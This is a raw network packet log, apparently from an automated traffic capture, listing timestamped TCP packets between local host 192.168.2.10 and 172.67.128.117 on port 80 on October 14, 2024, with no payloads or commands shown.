                                                      Oct 14, 2024 11:06:54.505336046 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.505567074 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505604982 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505614042 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505635023 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505644083 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.506077051 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.506077051 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.506494999 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.506519079 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.506527901 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.506561995 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.506571054 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.506798983 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.506798983 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.507452011 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.507464886 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.507482052 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.507491112 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.507539034 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.507539034 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.510159016 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.510174990 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.510225058 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.597369909 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597414970 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597434044 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597445011 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597454071 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597460032 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.597485065 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597493887 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597502947 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597511053 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.597537994 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.597548008 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597556114 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597572088 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597584963 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.597781897 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.597783089 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.597783089 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.598047972 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598092079 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598102093 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598118067 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598140955 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.598222017 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.598395109 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598404884 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598428011 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598437071 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598453045 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598522902 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.598851919 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598861933 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598877907 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598917007 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598923922 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598932028 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598933935 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.598939896 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.598964930 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.598985910 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.598995924 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599004984 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599020004 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599030018 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599041939 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.599062920 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.599798918 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599812031 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599832058 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599839926 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599848032 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599862099 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599885941 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.599885941 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.599885941 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.599888086 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599896908 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599905968 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599911928 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.599940062 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.599940062 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.599984884 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690053940 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690077066 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690097094 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690130949 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690164089 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690172911 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690184116 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690191984 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690201998 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690211058 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690212965 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690220118 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690228939 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690248966 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690248966 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690278053 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690371990 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690387964 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690397978 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690397978 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690412998 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690422058 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690423012 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690439939 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690445900 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690490007 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690490007 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690677881 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690685987 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690792084 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690824032 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690833092 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690848112 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690879107 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690881014 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690888882 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690905094 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690927982 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690969944 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.690984964 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.690994978 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691010952 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691019058 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691040993 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691061974 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691415071 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691423893 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691432953 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691458941 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691482067 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691490889 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691505909 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691513062 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691518068 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691528082 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691535950 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691543102 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.691554070 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691554070 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691600084 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691600084 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.691984892 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692018032 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692030907 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692039013 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692078114 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692095995 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692105055 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692112923 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692161083 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692168951 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692184925 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692193031 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692193985 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692210913 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692219019 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692219019 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692234993 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692243099 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692310095 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692327023 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692842960 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692941904 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692945004 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692950010 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692966938 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692974091 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.692996025 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.692996979 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.693005085 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.693017960 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.693022966 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.693032026 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.693039894 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.693048000 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.693073034 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.693454981 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.702426910 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702435017 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702445030 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702478886 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.702491045 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702498913 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.702507973 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702516079 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702523947 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702524900 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.702533007 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702539921 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.702567101 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.702585936 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783178091 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783189058 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783205032 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783212900 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783229113 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783236980 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783262014 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783262968 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783271074 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783278942 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783286095 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783293962 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783308983 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783318996 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783319950 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783334970 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783341885 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783402920 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783422947 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783431053 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783438921 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783446074 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783453941 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783458948 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783462048 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783478975 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.783483028 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783503056 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.783543110 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784682989 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784724951 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784740925 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784765005 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784785986 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784795046 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784799099 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784810066 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784818888 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784836054 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784866095 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784876108 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784883976 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784898996 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784907103 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784921885 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784929037 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784931898 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784945011 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.784951925 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784967899 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.784993887 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785027981 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785036087 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785059929 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785077095 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785077095 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785087109 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785101891 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785101891 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785109997 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785125017 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785134077 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785135984 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785160065 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785196066 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785320997 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785330057 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785345078 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785352945 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785367966 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785375118 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785378933 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785388947 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785389900 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785398960 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785406113 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785412073 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785423994 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785432100 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785439968 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785443068 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785448074 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785470963 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785471916 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785480022 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785486937 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785486937 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785495996 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785501957 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785511017 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785521030 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785552025 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785559893 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785571098 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785578966 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785584927 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785595894 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785598040 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785605907 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785610914 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785645008 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785655022 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785664082 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785677910 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.785793066 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.785793066 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788336039 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788343906 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788361073 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788379908 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788388014 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788395882 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788403988 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788412094 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788460016 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788526058 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788533926 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788541079 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788554907 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788563967 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788573027 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788579941 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788583040 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788588047 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788613081 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788614035 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788620949 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788629055 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788636923 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788640976 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788645029 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788665056 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.788671017 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788708925 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788708925 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.788749933 CEST8049975172.67.128.117192.168.2.10
